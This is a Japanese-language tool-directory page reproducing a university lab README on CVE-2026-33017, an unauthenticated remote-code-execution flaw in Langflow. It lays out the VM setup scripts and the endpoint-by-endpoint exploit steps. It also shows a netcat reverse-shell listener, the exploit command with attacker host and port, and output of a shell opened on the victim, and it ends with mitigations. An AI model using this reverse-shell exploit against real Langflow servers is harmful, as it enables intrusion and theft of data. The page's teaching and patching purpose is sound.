Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-33017 — 教育用ラボ。CVE-2026-33017を介したLangflowの未認証RCEを実演し、自動VMセットアップとリバースシェル用のPoCエクスプロイトを備えています。 | Kitploit
ツール/GitHubGitHub/jorrit-vm/cve-2026-33017
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育レッドチーミングリモートアクセスツールペイロード開発ラボと実践
GitHubjorrit-vm/cve-2026-33017

CVE-2026-33017

教育用ラボ。CVE-2026-33017を介したLangflowの未認証RCEを実演し、自動VMセットアップとリバースシェル用のPoCエクスプロイトを備えています。

164ヶ月前未レビュー
リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-33017 — Langflow 未認証RCE

HoGent CyberSecurity II — ネットワークペネトレーションテスト&エクスプロイテーション(NPE)
2025–2026年度

CVE CVSS Langflow


概要

このリポジトリには、Langflow ≤ 1.8.1 における重大な未認証リモートコード実行(RCE)脆弱性である CVE-2026-33017 の完全なラボ環境とエクスプロイト実証が含まれています。

攻撃者は認証なしで、/api/v1/build_public_tmp/{flow_id}/flow エンドポイントを介してサーバー上で任意のPythonコードを実行できます。これは、ユーザー入力がサンドボックス化や検証なしにPythonの exec() に直接渡されるためです。

⚠️ 免責事項: このリポジトリは、管理されたラボ環境での教育目的のみを対象としています。明示的な許可を得たシステムでのみ使用してください。


アーキテクチャ

root@kitploit:~
┌─────────────────────────────────────────────────────┐
│                   HOST MACHINE                      │
│                                                     │
│  ┌──────────────────┐     ┌───────────────────────┐ │
│  │  Langflow-Victim │     │    Kali-Attacker      │ │
│  │  Ubuntu 22.04    │     │    Kali Linux         │ │
│  │  192.168.56.101  │◄────│    192.168.56.100     │ │
│  │  Langflow 1.8.1  │     │    PoC exploit tool   │ │
│  │  port 7860       │     │    + internet (NAT)   │ │
│  └──────────────────┘     └───────────────────────┘ │
│          Host-only netwerk: 192.168.56.0/24         │
└─────────────────────────────────────────────────────┘

リポジトリ構造

root@kitploit:~
CVE-2026-33017/
├── README.md # Dit bestand
├── LICENSE
├── .gitignore
├── docs/
│ └── stappenplan.md # Volledige deployment & aanvalsgids
└── scripts/
├── setup_vms.sh # Fase 1: VirtualBox VMs aanmaken (HOST)
├── setup_victim.sh # Fase 2: Langflow 1.8.1 installeren (Ubuntu VM)
└── setup_attacker.sh # Fase 3: PoC tool installeren (Kali VM)

クイックスタート

前提条件

  • PATHに VBoxManage を含む VirtualBox 7.x
  • Ubuntu_22.04-VB-64bit.vdi → ubuntu-22.04.vdi にリネーム
  • Kali_Linux-VB-64bit.vdi → kali-linux.vdi にリネーム
  • 両方のVDIファイルを setup_vms.sh と同じディレクトリに配置

フェーズ1 — VMの作成(ホスト上)

root@kitploit:~
bash scripts/setup_vms.sh

フェーズ2 — Victim VMの設定(Ubuntu VM上)

root@kitploit:~
# ログイン情報: osboxes / osboxes.org
sudo bash scripts/setup_victim.sh

フェーズ3 — Attacker VMの設定(Kali VM上)

root@kitploit:~
# ログイン情報: osboxes / osboxes.org
sudo bash scripts/setup_attacker.sh

攻撃の実行

ターミナル1 — リバースシェルリスナー:

root@kitploit:~
nc -lvnp 4444

ターミナル2 — エクスプロイト:

root@kitploit:~
cd ~/CVE-2026-33017-Langflow-RCE-PoC
source venv/bin/activate
python3 cve-2026-33017.py 192.168.56.101 --shell \
  --lhost 192.168.56.100 --lport 4444

PoCは setup_attacker.sh によって自動的にインストールされます。
使用PoC: omer-efe-curkus/CVE-2026-33017-Langflow-RCE-PoC


エクスプロイトの仕組み

ステップエンドポイント説明
1GET /api/v1/auto_loginスーパーユーザーJWTトークンを取得(AUTO_LOGIN=true)
2POST /api/v1/flows/API経由で新しいパブリックフローを作成
3POST /api/v1/build_public_tmp/{id}/flow悪意のあるPythonコードを含む CustomComponent を注入
4validate.py:397 の exec()コードがサンドボックスなしで実行される — RCE

実行の証拠

[] Fetching access token... [+] Public Flow ID created: 11571add-6416-4226-b8e6-844202cce6ff [] Sending reverse shell to connect back to 192.168.56.100:4444

Listener (Terminal 1): connect to [192.168.56.100] from (UNKNOWN) [192.168.56.101] 36160 $ whoami user $ hostname e37190a2f147 $ find /app -name "*.db" /app/.venv/lib/python3.12/site-packages/langflow/langflow.db


緩和策

  • Langflow ≥ 1.9.0 に更新 — 脆弱な data パラメータを削除
  • 本番環境で LANGFLOW_AUTO_LOGIN を無効化
  • ファイアウォールでポート7860へのネットワークアクセスを制限
  • Langflowを認証付きリバースプロキシの背後に配置

参照

  • NVD — CVE-2026-33017
  • GitHub Advisory GHSA-vwmf-pq79-vjvx
  • Sysdig — Exploited in 20 hours
  • SonicWall — Technical Analysis
  • PoC door omer-efe-curkus

HoGent — Toegepaste Informatica — CyberSecurity II — 2025–2026

ツールをダウンロード